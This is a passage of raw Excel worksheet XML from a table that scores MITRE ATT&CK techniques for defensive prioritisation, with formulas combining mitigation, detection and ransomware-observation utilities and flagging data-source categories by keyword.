        <v>33</v>
      </c>
      <c r="X221" s="37">
        <v>0.6</v>
      </c>
      <c r="Y221" s="37">
        <v>0.6</v>
      </c>
      <c r="Z221" s="37">
        <v>22</v>
      </c>
      <c r="AA221" s="37">
        <v>0.22</v>
      </c>
      <c r="AB221" s="37">
        <v>0.22</v>
      </c>
      <c r="AC221" s="37"/>
      <c r="AD221" s="50" t="s">
        <v>777</v>
      </c>
      <c r="AE221" s="37" t="str" cm="1">
        <f t="array" ref="AE221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD221)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF221" s="37">
        <v>217</v>
      </c>
      <c r="AG221" s="37" t="str" cm="1">
        <f t="array" ref="AG221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD221)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH221" s="37">
        <v>217</v>
      </c>
      <c r="AI221" s="37" t="str" cm="1">
        <f t="array" ref="AI221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD221)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ221" s="37">
        <v>217</v>
      </c>
      <c r="AK221" s="37" t="str" cm="1">
        <f t="array" ref="AK221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD221)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL221" s="37">
        <v>217</v>
      </c>
      <c r="AM221" s="37" t="str" cm="1">
        <f t="array" ref="AM221">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD221)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN221" s="37">
        <v>0</v>
      </c>
      <c r="AO221" s="37">
        <v>1</v>
      </c>
      <c r="AP221" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ221" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>193.88653498412694</v>
      </c>
      <c r="AR221" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS221" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT221" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU22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4.6401555948601656</v>
      </c>
    </row>
    <row r="222" spans="1:47" ht="34">
      <c r="A222" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B222" s="37">
        <f t="shared" si="3"/>
        <v>320.1001247142857</v>
      </c>
      <c r="C222" s="37" t="s">
        <v>778</v>
      </c>
      <c r="D222" s="50" t="s">
        <v>775</v>
      </c>
      <c r="E222" s="37" t="s">
        <v>587</v>
      </c>
      <c r="F222" s="37">
        <v>1</v>
      </c>
      <c r="G222" s="37">
        <v>1</v>
      </c>
      <c r="H222" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I222" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J222" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K222" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L222" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M222" s="37">
        <v>0</v>
      </c>
      <c r="N222" s="56">
        <v>1</v>
      </c>
      <c r="O222" s="56">
        <v>12</v>
      </c>
      <c r="P222" s="56">
        <v>2</v>
      </c>
      <c r="Q222" s="56">
        <v>5</v>
      </c>
      <c r="R222" s="57" t="s">
        <v>779</v>
      </c>
      <c r="S222" s="57">
        <v>7</v>
      </c>
      <c r="T222" s="57" t="s">
        <v>641</v>
      </c>
      <c r="U222" s="57">
        <v>11</v>
      </c>
      <c r="V222" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.2666668095238095</v>
      </c>
      <c r="W222" s="37">
        <v>18</v>
      </c>
      <c r="X222" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y222" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z222" s="37">
        <v>20</v>
      </c>
      <c r="AA222" s="37">
        <v>0.2</v>
      </c>
      <c r="AB222" s="37">
        <v>0.2</v>
      </c>
      <c r="AC222" s="37"/>
      <c r="AD222" s="50" t="s">
        <v>777</v>
      </c>
      <c r="AE222" s="37" t="str" cm="1">
        <f t="array" ref="AE222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD222)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF222" s="37">
        <v>218</v>
      </c>
      <c r="AG222" s="37" t="str" cm="1">
        <f t="array" ref="AG222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD222)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH222" s="37">
        <v>218</v>
      </c>
      <c r="AI222" s="37" t="str" cm="1">
        <f t="array" ref="AI222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD222)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ222" s="37">
        <v>218</v>
      </c>
      <c r="AK222" s="37" t="str" cm="1">
        <f t="array" ref="AK222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD222)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL222" s="37">
        <v>218</v>
      </c>
      <c r="AM222" s="37" t="str" cm="1">
        <f t="array" ref="AM222">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD222)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN222" s="37">
        <v>0</v>
      </c>
      <c r="AO222" s="37">
        <v>0</v>
      </c>
      <c r="AP222" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ222" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>106.70004157142857</v>
      </c>
      <c r="AR222" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS222" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT222" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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23" spans="1:47" ht="34">
      <c r="A223" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B223" s="37">
        <f t="shared" si="3"/>
        <v>363.32848790476191</v>
      </c>
      <c r="C223" s="37" t="s">
        <v>780</v>
      </c>
      <c r="D223" s="50" t="s">
        <v>775</v>
      </c>
      <c r="E223" s="37" t="s">
        <v>590</v>
      </c>
      <c r="F223" s="37">
        <v>1</v>
      </c>
      <c r="G223" s="37">
        <v>1</v>
      </c>
      <c r="H223" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I223" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J223" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K223" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L223" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M223" s="37">
        <v>0</v>
      </c>
      <c r="N223" s="56">
        <v>0</v>
      </c>
      <c r="O223" s="56">
        <v>2</v>
      </c>
      <c r="P223" s="56">
        <v>0</v>
      </c>
      <c r="Q223" s="56">
        <v>0</v>
      </c>
      <c r="R223" s="57" t="s">
        <v>781</v>
      </c>
      <c r="S223" s="57">
        <v>17</v>
      </c>
      <c r="T223" s="57" t="s">
        <v>636</v>
      </c>
      <c r="U223" s="57">
        <v>15</v>
      </c>
      <c r="V223" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.31428561904761904</v>
      </c>
      <c r="W223" s="37">
        <v>32</v>
      </c>
      <c r="X223" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y223" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z223" s="37">
        <v>2</v>
      </c>
      <c r="AA223" s="37">
        <v>0.02</v>
      </c>
      <c r="AB223" s="37">
        <v>0.02</v>
      </c>
      <c r="AC223" s="37"/>
      <c r="AD223" s="50" t="s">
        <v>777</v>
      </c>
      <c r="AE223" s="37" t="str" cm="1">
        <f t="array" ref="AE223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD223)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF223" s="37">
        <v>219</v>
      </c>
      <c r="AG223" s="37" t="str" cm="1">
        <f t="array" ref="AG223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD223)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH223" s="37">
        <v>219</v>
      </c>
      <c r="AI223" s="37" t="str" cm="1">
        <f t="array" ref="AI223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD223)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ223" s="37">
        <v>219</v>
      </c>
      <c r="AK223" s="37" t="str" cm="1">
        <f t="array" ref="AK223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD223)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL223" s="37">
        <v>219</v>
      </c>
      <c r="AM223" s="37" t="str" cm="1">
        <f t="array" ref="AM223">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD223)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN223" s="37">
        <v>0</v>
      </c>
      <c r="AO223" s="37">
        <v>0</v>
      </c>
      <c r="AP223" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ223" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>121.10949596825397</v>
      </c>
      <c r="AR223" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS223" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT223" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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24" spans="1:47" ht="17">
      <c r="A224" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B224" s="37">
        <f t="shared" si="3"/>
        <v>406.93792742857141</v>
      </c>
      <c r="C224" s="37" t="s">
        <v>782</v>
      </c>
      <c r="D224" s="50" t="s">
        <v>775</v>
      </c>
      <c r="E224" s="37" t="s">
        <v>595</v>
      </c>
      <c r="F224" s="37">
        <v>1</v>
      </c>
      <c r="G224" s="37">
        <v>1</v>
      </c>
      <c r="H224" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I224" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J224" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K224" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L224" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M224" s="37">
        <v>0</v>
      </c>
      <c r="N224" s="56">
        <v>0</v>
      </c>
      <c r="O224" s="56">
        <v>2</v>
      </c>
      <c r="P224" s="56">
        <v>2</v>
      </c>
      <c r="Q224" s="56">
        <v>10</v>
      </c>
      <c r="R224" s="57" t="s">
        <v>783</v>
      </c>
      <c r="S224" s="57">
        <v>16</v>
      </c>
      <c r="T224" s="57" t="s">
        <v>636</v>
      </c>
      <c r="U224" s="57">
        <v>15</v>
      </c>
      <c r="V224" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.36190457142857146</v>
      </c>
      <c r="W224" s="37">
        <v>31</v>
      </c>
      <c r="X224" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Y224" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Z224" s="37">
        <v>14</v>
      </c>
      <c r="AA224" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AB224" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AC224" s="37"/>
      <c r="AD224" s="50" t="s">
        <v>784</v>
      </c>
      <c r="AE224" s="37" t="str" cm="1">
        <f t="array" ref="AE224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD224)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF224" s="37">
        <v>220</v>
      </c>
      <c r="AG224" s="37" t="str" cm="1">
        <f t="array" ref="AG224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD224)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH224" s="37">
        <v>220</v>
      </c>
      <c r="AI224" s="37" t="str" cm="1">
        <f t="array" ref="AI224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD224)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ224" s="37">
        <v>220</v>
      </c>
      <c r="AK224" s="37" t="str" cm="1">
        <f t="array" ref="AK224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD224)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL224" s="37">
        <v>220</v>
      </c>
      <c r="AM224" s="37" t="str" cm="1">
        <f t="array" ref="AM224">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD224)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN224" s="37">
        <v>0</v>
      </c>
      <c r="AO224" s="37">
        <v>0</v>
      </c>
      <c r="AP224" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ224" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>135.6459758095238</v>
      </c>
      <c r="AR224" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS224" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT224" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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25" spans="1:47" ht="102">
      <c r="A225" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B225" s="37">
        <f t="shared" si="3"/>
        <v>345.40146642857144</v>
      </c>
      <c r="C225" s="37" t="s">
        <v>785</v>
      </c>
      <c r="D225" s="50" t="s">
        <v>786</v>
      </c>
      <c r="E225" s="37"/>
      <c r="F225" s="37">
        <v>1</v>
      </c>
      <c r="G225" s="37">
        <v>1</v>
      </c>
      <c r="H225" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I225" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J225" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K225" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L225" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M225" s="37">
        <v>4.5700000000000003E-3</v>
      </c>
      <c r="N225" s="56">
        <v>0</v>
      </c>
      <c r="O225" s="56">
        <v>6</v>
      </c>
      <c r="P225" s="56">
        <v>2</v>
      </c>
      <c r="Q225" s="56">
        <v>0</v>
      </c>
      <c r="R225" s="57" t="s">
        <v>787</v>
      </c>
      <c r="S225" s="57">
        <v>13</v>
      </c>
      <c r="T225" s="57" t="s">
        <v>788</v>
      </c>
      <c r="U225" s="57">
        <v>13</v>
      </c>
      <c r="V225" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.28571414285714286</v>
      </c>
      <c r="W225" s="37">
        <v>26</v>
      </c>
      <c r="X225" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y225" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z225" s="37">
        <v>8</v>
      </c>
      <c r="AA225" s="37">
        <v>0.08</v>
      </c>
      <c r="AB225" s="37">
        <v>0.08</v>
      </c>
      <c r="AC225" s="37"/>
      <c r="AD225" s="50" t="s">
        <v>789</v>
      </c>
      <c r="AE225" s="37" t="str" cm="1">
        <f t="array" ref="AE225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD225)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF225" s="37">
        <v>221</v>
      </c>
      <c r="AG225" s="37" t="str" cm="1">
        <f t="array" ref="AG225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD225)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH225" s="37">
        <v>221</v>
      </c>
      <c r="AI225" s="37" t="str" cm="1">
        <f t="array" ref="AI225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD225)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ225" s="37">
        <v>221</v>
      </c>
      <c r="AK225" s="37" t="str" cm="1">
        <f t="array" ref="AK225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD225)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL225" s="37">
        <v>221</v>
      </c>
      <c r="AM225" s="37" t="str" cm="1">
        <f t="array" ref="AM225">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD225)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN225" s="37">
        <v>0</v>
      </c>
      <c r="AO225" s="37">
        <v>2</v>
      </c>
      <c r="AP225" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ225" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>115.13382214285714</v>
      </c>
      <c r="AR225" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS225" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT225" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU22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5.530182006802721</v>
      </c>
    </row>
    <row r="226" spans="1:47" ht="68">
      <c r="A226" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B226" s="37">
        <f t="shared" si="3"/>
        <v>232.83337566666671</v>
      </c>
      <c r="C226" s="37" t="s">
        <v>790</v>
      </c>
      <c r="D226" s="50" t="s">
        <v>786</v>
      </c>
      <c r="E226" s="37" t="s">
        <v>791</v>
      </c>
      <c r="F226" s="37">
        <v>1</v>
      </c>
      <c r="G226" s="37">
        <v>1</v>
      </c>
      <c r="H226" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I226" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J226" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K226" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L226" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M226" s="37">
        <v>0</v>
      </c>
      <c r="N226" s="56">
        <v>0</v>
      </c>
      <c r="O226" s="56">
        <v>0</v>
      </c>
      <c r="P226" s="56">
        <v>0</v>
      </c>
      <c r="Q226" s="56">
        <v>0</v>
      </c>
      <c r="R226" s="57" t="s">
        <v>792</v>
      </c>
      <c r="S226" s="57">
        <v>7</v>
      </c>
      <c r="T226" s="57" t="s">
        <v>793</v>
      </c>
      <c r="U226" s="57">
        <v>10</v>
      </c>
      <c r="V226" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16190480952380953</v>
      </c>
      <c r="W226" s="37">
        <v>17</v>
      </c>
      <c r="X226" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y226" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z226" s="37">
        <v>0</v>
      </c>
      <c r="AA226" s="37">
        <v>0</v>
      </c>
      <c r="AB226" s="37">
        <v>0</v>
      </c>
      <c r="AC226" s="37"/>
      <c r="AD226" s="50" t="s">
        <v>794</v>
      </c>
      <c r="AE226" s="37" t="str" cm="1">
        <f t="array" ref="AE226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD226)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF226" s="37">
        <v>222</v>
      </c>
      <c r="AG226" s="37" t="str" cm="1">
        <f t="array" ref="AG226">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD226)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH226" s="37">
        <v>222</v>
      </c>
      <c r="AI226" s="37" t="str" cm="1">
